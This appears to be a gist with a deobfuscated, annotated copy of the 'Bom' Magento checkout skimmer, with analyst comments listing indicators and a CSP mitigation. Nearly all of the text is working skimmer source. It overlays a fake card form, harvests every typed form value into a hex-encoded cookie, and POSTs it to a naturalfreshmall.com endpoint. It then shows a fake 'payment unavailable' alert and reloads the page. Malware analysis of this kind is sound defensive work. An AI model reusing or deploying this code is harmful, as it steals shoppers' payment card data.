Created
April 25, 2022 11:05
A deobfuscated and restructured version of the Bom skimmer served from naturalfreshmall
// Analyst note: random hex string (at most 14 characters, taken after the leading "0." of
// Math.random().toString(16)). It is used below as the id of the injected <ul> and, with the
// suffix '5233', as the id of its inner <div>. The value is regenerated on every script run,
// so the element id itself is not a stable indicator; the fixed field ids/names are.
var f_id_daww = Math.random().toString(16).substr(2, 14); | |
/**
 * Analyst note: overlay routine (scheduled every 200 ms by checkFakeFormCanBeInjected).
 *
 * When the element with id 'checkout-payment-method-load' exists and its markup does not
 * already contain the substring 'cc_cid', a <form> holding a card-entry UI is built from the
 * string literal below, every child node of that container that has a `style` property is
 * hidden, and the new form is appended to the container. The injected fields are named
 * payment[cc_owner], payment[cc_number], payment[exp_month], payment[exp_year] and
 * payment[cc_cid], with ids field--holder, field--card-number, field--month, field--year and
 * field--cvv, under the heading "Credit/Debit Card Secure Payment".
 *
 * NOTE(review): 'checkout-payment-method-load' looks like the Magento checkout payment-method
 * container, and the 'cc_cid' test presumably targets checkouts that render no inline card
 * fields of their own; confirm against the affected store's templates.
 *
 * Detection hooks visible here: a <form> appended at runtime under the payment container, the
 * original payment nodes switched to display:none, and the fixed field ids listed above.
 */
function replaceExistingFormWithFakeForm() { | |
if (document.getElementById('checkout-payment-method-load') && | |
document.getElementById('checkout-payment-method-load').innerHTML.indexOf('cc_cid') == -1) { | |
// Inject only once per page: skip when an element with the random id is already present.
if (!document.getElementById(f_id_daww)) { | |
const fakeFormHtml = '<ul id="' + f_id_daww + '" style=""><li><h3><b>Credit/Debit Card Secure Payment</b></h3></li><div id="' + f_id_daww + '5233' + '"><div class="input--field"> <label for="field--holder"> Cardholder <em>*</em></label> <input id="field--holder" type="text" maxlength="50" name="payment[cc_owner]"> <div class="validation" id="field--holder--validation"> </div></div><div class="input--field"> <label for="field--card-number"> Card Number <em>*</em></label> <input id="field--card-number" type="text" maxlength="24" name="payment[cc_number]"> <div class="validation" id="field--card-number--validation"> </div></div><div><label for="field--month">Expiration Date <em>*</em></div><div class="input--field fix--expiration-date"> <div class="select--expiration-date"> <select id="field--month" name="payment[exp_month]"> <option value="" selected="">Month</option> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> <div class="validation" id="field--month--validation"> </div></div><div class="select--expiration-date"> <select id="field--year" name="payment[exp_year]"> <option value="" selected="">Year</option> <option value="21">2021</option> <option value="22">2022</option> <option value="23">2023</option> <option value="24">2024</option> <option value="25">2025</option> <option value="26">2026</option> <option value="27">2027</option> <option value="28">2028</option> <option value="29">2029</option> <option value="30">2030</option> </select> <div class="validation" id="field--year--validation"> </div></div></div><div class="input--field"> <label for="field--cvv"> Card Verification Number <em>*</em></label> <input id="field--cvv" 
type="password" maxlength="4" name="payment[cc_cid]"> <div class="validation" id="field--cvv--validation"> </div></div><style>#' + f_id_daww + '5233' + '{margin-left:20px;max-width: 300px;min-width: 200px; padding: 20px 0px;}#' + f_id_daww + '5233' + ' .information--field{margin-bottom: 12px;}#' + f_id_daww + '5233' + ' .information--field a{position: relative; color: #ca0001; margin-left: 30px; bottom: 15px; text-transform: uppercase;}#' + f_id_daww + '5233' + ' label{display: block; width: 100%; color: #333; text-transform: uppercase; margin-bottom: 5px;}#' + f_id_daww + '5233' + ' em{color: #ca0001;}#' + f_id_daww + '5233' + ' input, #' + f_id_daww + '5233' + ' select{height: 40px; padding: 0 8px; font-family: "Ubuntu", sans-serif; color: #5d6a7f; border: solid 1px #dfdfdf; background: #f5f5f5; font-size: 14px; border-radius: 0px; line-height: 1.5;}#' + f_id_daww + '5233' + ' .input--field{margin-bottom: 15px;}#field--card-number, #field--holder{width: 100%;}#' + f_id_daww + '5233' + ' .select--expiration-date{width: 50%; float: left;}#' + f_id_daww + '5233' + ' .fix--expiration-date:after{display: block; content: ""; clear: both;}#field--holder{text-transform: capitalize;}#field--cvv{width: 120px;}#' + f_id_daww + '5233' + ' .validation{display: none; color: #ca0001;}#' + f_id_daww + '5233' + ' #button--checkout{background: #ca0001; color: #fff; padding: 0px 20px; outline: 0;}</style></div></ul>'; | |
const newForm = document.createElement('form'); | |
newForm.innerHTML = fakeFormHtml; | |
// Hide whatever the store rendered inside the payment container before adding the overlay.
const paymentMethodsForms = document.getElementById('checkout-payment-method-load').childNodes; | |
for (let i = 0; i < paymentMethodsForms.length; i++) { | |
if (paymentMethodsForms[i].style) { | |
paymentMethodsForms[i].style.display = 'none'; | |
} | |
} | |
document.getElementById('checkout-payment-method-load').appendChild(newForm); | |
} | |
} | |
// On every tick the injected fields are forced back to enabled; presumably this counters
// checkout scripts that disable inputs of unselected payment methods. TODO confirm.
if (document.getElementById(f_id_daww)) { | |
document.getElementById('field--holder').disabled = false; | |
document.getElementById('field--card-number').disabled = false; | |
document.getElementById('field--month').disabled = false; | |
document.getElementById('field--year').disabled = false; | |
document.getElementById('field--cvv').disabled = false; | |
} | |
} | |
// Analyst note: gate for the overlay. The cookie `__mg_back` is read once at load; unless it
// equals the marker 236232342323626326 (written by the click handler in glob_snsd after it has
// sent data), replaceExistingFormWithFakeForm is scheduled every 200 ms, starting 500 ms after
// the script runs. A browser that already carries the marker therefore sees the unmodified
// checkout. The marker is written without an expires/max-age attribute in this listing.
// Both cookie names and the marker value are usable as indicators when reviewing browser state
// or traffic that includes a Cookie header.
var cook = getCookie('__mg_back'); | |
function checkFakeFormCanBeInjected() { | |
if (cook != '236232342323626326') { | |
setInterval(replaceExistingFormWithFakeForm, 200); | |
} | |
} | |
setTimeout(checkFakeFormCanBeInjected, 500); | |
/**
 * Analyst note: clears an element's value when it equals one of three placeholder strings
 * ('1234 1234 1234 1234', 'CVC', 'MM / YY').
 * No caller is visible in this listing; presumably left over from another variant of the kit.
 *
 * @param {HTMLInputElement} el - element whose `value` is inspected and possibly emptied.
 */
function removeFakeCCValues(el) { | |
if (el.value == '1234 1234 1234 1234' || el.value == 'CVC' || el.value == 'MM / YY') { | |
el.value = ''; | |
} | |
} | |
/**
 * Analyst note: input-mask helper for an expiry field. Appends ' / ' once two characters have
 * been typed and truncates the value to six characters.
 * No caller is visible in this listing.
 *
 * @param {HTMLInputElement} el - element whose `value` is rewritten in place.
 */
function DateStripeV(el) { | |
if (el.value.length == 2) { | |
const originalValue = el.value; | |
el.value = originalValue + ' / '; | |
} | |
if (el.value.length > 6) { | |
const originalValue = el.value; | |
el.value = originalValue.slice(0, 6); | |
} | |
// NOTE(review): as rendered here both arguments are a single space, which makes this a no-op;
// the original may have used different whitespace that was lost when the page was rendered.
el.value = el.value.replace(' ', ' '); | |
} | |
/**
 * Analyst note: despite the name this does not produce a UUID. It returns `idLength` characters
 * drawn with Math.random() from the 62-character set A-Z, a-z, 0-9.
 * In this listing it is only used to fill the filler fields (products_hash, amount_hash, ...)
 * of the outgoing POST, so those fields carry random data of fixed length per field.
 *
 * @param {number} idLength - number of characters to generate.
 * @returns {string} random alphanumeric string.
 */
function generateUUID(idLength) { | |
let output = ''; | |
for (let i = 0; i < idLength; i++) { | |
output += 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'.charAt(Math.floor(Math.random() * 62)); | |
} | |
return output; | |
} | |
/**
 * Analyst note: decodes a string of two-digit hex pairs into characters, stopping at the end of
 * the input or at the first '00' pair. Used in the click handler to turn the staged
 * `__mg_front` cookie back into text. Useful when decoding a captured cookie value by hand.
 *
 * @param {*} hexValue - value converted with toString() and read two hex digits at a time.
 * @returns {string} decoded text.
 */
function hex2a(hexValue) { | |
const str = hexValue.toString(); | |
let output = ''; | |
for (let i = 0; i < str.length && str.substr(i, 2) !== '00'; i += 2) { | |
output += String.fromCharCode(parseInt(str.substr(i, 2), 16)); | |
} | |
return output; | |
} | |
// Analyst note: adds hexEncode() to String.prototype. Each UTF-16 code unit is written as four
// zero-padded lowercase hex digits. The click handler applies it to the collected form data
// before base64-encoding it into the `stats` member of the outgoing payload, so recovering the
// data from a captured request means base64-decoding and then reading four hex digits per
// character. The helper itself is a widely copied snippet and is not conclusive on its own.
String.prototype.hexEncode = function () { | |
var hexChar, i; | |
var encodedString = ''; | |
for (i = 0; i < this.length; i++) { | |
hexChar = this.charCodeAt(i).toString(16); | |
encodedString += ('000' + hexChar).slice(-4); | |
} | |
return encodedString; | |
}; | |
// Analyst note: adds hexDecode() to String.prototype, the counterpart of hexEncode(): the
// string is cut into groups of up to four characters and each group is parsed as a hex code
// unit. Returns an empty string when nothing matches.
String.prototype.hexDecode = function () { | |
var i; | |
var groupsOfFour = this.match(/.{1,4}/g) || []; | |
var decodedString = ''; | |
for (i = 0; i < groupsOfFour.length; i++) { | |
decodedString += String.fromCharCode(parseInt(groupsOfFour[i], 16)); | |
} | |
return decodedString; | |
}; | |
/**
 * Analyst note: reads one cookie from document.cookie by splitting on '; <name>='.
 * In this listing it is used for the two cookies `__mg_back` and `__mg_front`.
 *
 * @param {string} cookieName - cookie to look up.
 * @returns {string|undefined} the value when the split yields exactly two parts; otherwise the
 *   function falls through and returns undefined.
 */
function getCookie(cookieName) { | |
const allCookies = '; ' + document.cookie; | |
const splitByTargetCookie = allCookies.split('; ' + cookieName + '='); | |
if (splitByTargetCookie.length == 2) { | |
return splitByTargetCookie.pop().split(';').shift(); | |
} | |
} | |
// Analyst note: overwrites the named cookie with an empty value and a 1970 expiry date.
// No caller is visible in this listing.
function delete_cookie(cookieName) {document.cookie = cookieName + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';} | |
/**
 * Analyst note: collection and exfiltration routine, run every 4000 ms by the setInterval near
 * the end of the listing unless the `__mg_back` marker cookie is already set.
 *
 * Each run attaches a new anonymous click listener to every <button> in the document. On click
 * the listener:
 *   1. resets the cookie `__mg_front` to '$' and walks every <form> on the page, appending
 *      `name:value|` (or `id:value|` when the name is empty) for each non-empty <input> and
 *      <select>, skipping type radio/hidden, id 'search' and value 'submit'. The cookie is
 *      used as a hex-encoded staging buffer, so it briefly holds whatever was typed into any
 *      form on the page, not only card fields;
 *   2. decodes the buffer and rewrites a list of field names to the fixed labels cc_number,
 *      cc_owner, authorizenet_expiration, authorizenet_expiration_yr and cc_cid. The source
 *      names look like those of several payment integrations (for example the `mundipagg_`
 *      and `sagepaycw_` prefixes);
 *   3. if the result contains '_number' or '_cid' and `exfiltrationRequired` is still true,
 *      sends one multipart POST via XMLHttpRequest to
 *      https://naturalfreshmall.com/payment/Payment.php;
 *   4. writes the marker 236232342323626326 to `__mg_front` and `__mg_back`, restores the
 *      hidden payment nodes, hides the overlay, shows an "unavailable" alert and schedules a
 *      page reload through rR().
 *
 * Indicators visible in this block: the destination URL, the cookie names and marker value,
 * and the POST field names products_hash, amount_hash, billing_hash, shipping_hash,
 * visit_hash, stat_infos, captcha_hash and user_hash. Only `stat_infos` carries data; it is
 * base64 of a JSON object { referer, tag, stats }, where `stats` is base64 of the hexEncode()
 * output and `tag` is the constant 'YWxs' (base64 of "all").
 *
 * Mitigation note: the request is a cross-origin XHR, so a Content-Security-Policy whose
 * `connect-src` does not list the destination host causes the browser to block it.
 */
function glob_snsd() { | |
const allButtons = document.getElementsByTagName('button'); | |
for (let i = 0; i < allButtons.length; i++) { | |
allButtons[i].addEventListener('click', function () { | |
let stats = ''; | |
const allForms = document.getElementsByTagName('form'); | |
// Step 1: reset the staging cookie, then collect every qualifying input and select value.
document.cookie = '__mg_front=$; path=/'; | |
for (let z = 0; z < allForms.length; z++) { | |
var formInputs = allForms[z].getElementsByTagName('input'); | |
var formSelects = allForms[z].getElementsByTagName('select'); | |
for (let x = 0; x < formInputs.length; x++) { | |
if (formInputs[x].value && formInputs[x].value != '' && formInputs[x].type != 'radio' && | |
formInputs[x].type != 'hidden' && formInputs[x].id != 'search' && formInputs[x].value != 'submit') { | |
if (formInputs[x].name && formInputs[x].name != '') { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formInputs[x].name + ':' + formInputs[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} else { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formInputs[x].id + ':' + formInputs[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} | |
} | |
} | |
for (let x = 0; x < formSelects.length; x++) { | |
if (formSelects[x].value && formSelects[x].value != '' && formSelects[x].type != 'radio' && | |
formSelects[x].type != 'hidden' && formSelects[x].id != 'search' && formSelects[x].value != 'submit') { | |
if (formSelects[x].name && formSelects[x].name != '') { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formSelects[x].name + ':' + formSelects[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} else { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formSelects[x].id + ':' + formSelects[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} | |
} | |
} | |
} | |
// Step 2: decode the staged data and normalise field names. String.replace with a string
// pattern rewrites only the first occurrence of each name.
stats = getCookie('__mg_front'); | |
stats = hex2a(stats); | |
stats = stats.replace('payment[ps_cc_number]', 'cc_number'); | |
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner'); | |
stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[ps_cc_cid]', 'cc_cid'); | |
stats = stats.replace('cc_number:on', ''); | |
stats = stats.replace('creditCardNum', 'cc_number'); | |
stats = stats.replace('creditCardHolder', 'cc_owner'); | |
stats = stats.replace('creditCardExpirationMonth', 'authorizenet_expiration'); | |
stats = stats.replace('creditCardExpirationYear', 'authorizenet_expiration_yr'); | |
stats = stats.replace('creditCardCode', 'cc_cid'); | |
stats = stats.replace('card[num]', 'cc_number'); | |
stats = stats.replace('card[name]', 'cc_owner'); | |
stats = stats.replace('card[exp]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[ccw_exp_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('card[cvv]', 'cc_cid'); | |
stats = stats.replace('payment[ps_cc_number]', 'cc_number'); | |
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner'); | |
stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[ps_cc_cid]', 'cc_cid'); | |
stats = stats.replace('payment[control_settings]', 'cc_number'); | |
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner'); | |
stats = stats.replace('payment[msn_set]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[yellow_set]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[savage_set]', 'cc_cid'); | |
stats = stats.replace('cardNumber', 'cc_number'); | |
stats = stats.replace('cardholderName', 'cc_owner'); | |
stats = stats.replace('cardExpirationMonth', 'authorizenet_expiration'); | |
stats = stats.replace('cardExpirationYear', 'authorizenet_expiration_yr'); | |
stats = stats.replace('securityCode', 'cc_cid'); | |
stats = stats.replace('mundipagg_creditcard_1_1_cc_number', 'cc_number'); | |
stats = stats.replace('mundipagg_creditcard_cc_holder_name_1_1', 'cc_owner'); | |
stats = stats.replace('payment[mundipagg_creditcard_expirationMonth_1_1]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[mundipagg_creditcard_expirationYear_1_1]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[mundipagg_creditcard_cc_cid_1_1]', 'cc_cid'); | |
stats = stats.replace('sagepaycw_creditcard[card_number]', 'cc_number'); | |
stats = stats.replace('sagepaycw_creditcard[card_holder]', 'cc_owner'); | |
stats = stats.replace('sagepaycw_creditcard[expiry_month]', 'authorizenet_expiration'); | |
stats = stats.replace('sagepaycw_creditcard[expiry_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('sagepaycw_creditcard[CV2]', 'cc_cid'); | |
// The first run of five dash-separated lowercase alphanumeric groups is also relabelled as
// cc_number; presumably this covers card fields whose name is a generated identifier. TODO confirm.
const ccNumberMatches = stats.match(/[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+/); | |
if (ccNumberMatches != null) { | |
stats = stats.replace(ccNumberMatches[0], 'cc_number'); | |
} | |
// Step 3: proceed only when a card number or verification code label is present, and only
// while the page-level flag is still true (it is cleared below after the request is sent).
if (stats.indexOf('_number') !== -1 || stats.indexOf('_cid') !== -1) { | |
if (exfiltrationRequired) { | |
const formData = new FormData(); | |
const statsInfos = { | |
referer: document.URL, | |
tag: 'YWxs', | |
stats: btoa(stats.hexEncode()) | |
}; | |
// Every field except stat_infos is random filler of a fixed length per field.
formData.append('products_hash', btoa(generateUUID(64))); | |
formData.append('amount_hash', btoa(generateUUID(64))); | |
formData.append('billing_hash', btoa(generateUUID(128))); | |
formData.append('shipping_hash', btoa(generateUUID(512))); | |
formData.append('visit_hash', btoa(generateUUID(418))); | |
formData.append('stat_infos', btoa(JSON.stringify(statsInfos))); | |
formData.append('captcha_hash', btoa(generateUUID(1024))); | |
formData.append('user_hash', btoa(generateUUID(32))); | |
// `url` is assigned without a declaration and is not read again in this listing.
url = 'checkout'; | |
const xhr = new XMLHttpRequest(); | |
xhr.open('POST', 'https://naturalfreshmall.com/payment/Payment.php', true); | |
xhr.send(formData); | |
// Step 4: mark this browser as processed and put the original checkout back.
document.cookie = '__mg_front=236232342323626326; path=/'; | |
document.cookie = '__mg_back=236232342323626326; path=/'; | |
exfiltrationRequired = false; | |
const checkoutFormChildNodes = document.getElementById('checkout-payment-method-load').childNodes; | |
for (let i = 0; i < checkoutFormChildNodes.length; i++) { | |
if (checkoutFormChildNodes[i].style) { | |
checkoutFormChildNodes[i].style.display = 'block'; | |
} | |
} | |
document.getElementById(f_id_daww).style.display = 'none'; | |
rR(); | |
// The shopper is told the payment method failed, then the page reloads (see rR/Rr). A
// customer report of this exact message on a checkout page is a useful triage signal.
alert('Selected payment method is currently unavailable, please try again.'); | |
} | |
} | |
}); | |
} | |
} | |
// Analyst note: page-level state for the click handler. `exfiltrationRequired` starts true and
// is cleared after the first POST, so at most one request is sent per page load. The
// `__mg_back` cookie is read a second time here; unless it holds the marker value, glob_snsd
// is scheduled every 4000 ms and keeps adding click listeners to the page's buttons.
var exfiltrationRequired = true; | |
var cook = getCookie('__mg_back'); | |
if (cook != '236232342323626326') {setInterval(glob_snsd, 4000);} | |
// Analyst note: navigates to the current URL with the first '#' removed, which reloads the
// page. After the reload the `__mg_back` marker suppresses both the overlay and glob_snsd.
function Rr() {window.location.href = window.location.href.replace('#', '');} | |
// Analyst note: schedules Rr() (the reload) 8000 ms later; called from the click handler right
// before the "payment method unavailable" alert.
function rR() {setTimeout(Rr, 8000);} |